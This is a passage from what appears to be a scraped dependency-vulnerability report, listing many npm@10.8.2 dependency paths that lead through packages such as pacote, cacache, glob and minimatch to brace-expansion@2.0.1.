  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmaccess@8.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmhook@10.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmorg@6.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmsearch@7.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmteam@6.0.5 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + npm-profile@10.0.0 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmversion@6.0.3 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpublish@9.0.9 + + sigstore@2.3.1 + + @sigstore/sign@2.3.2 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/package-json@5.2.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-packlist@8.0.2 + + ignore-walk@6.0.5 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + sigstore@2.3.1 + + @sigstore/tuf@2.3.4 + + tuf-js@2.2.1 + + @tufjs/models@2.0.1 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + pacote@18.0.6 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmpack@7.0.4 + + @npmcli/arborist@7.5.4 + + @npmcli/run-script@8.1.0 + + node-gyp@10.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + @npmcli/arborist@7.5.4 + + @npmcli/metavuln-calculator@7.1.1 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmdiff@6.1.4 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmexec@8.1.3 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
  • + Introduced through: + lib@* + + npm@10.8.2 + + libnpmfund@5.0.12 + + @npmcli/arborist@7.5.4 + + pacote@18.0.6 + + npm-registry-fetch@17.1.0 + + make-fetch-happen@13.0.1 + + cacache@18.0.3 + + glob@10.4.2 + + minimatch@9.0.5 + + brace-expansion@2.0.1 + + + +
    • +
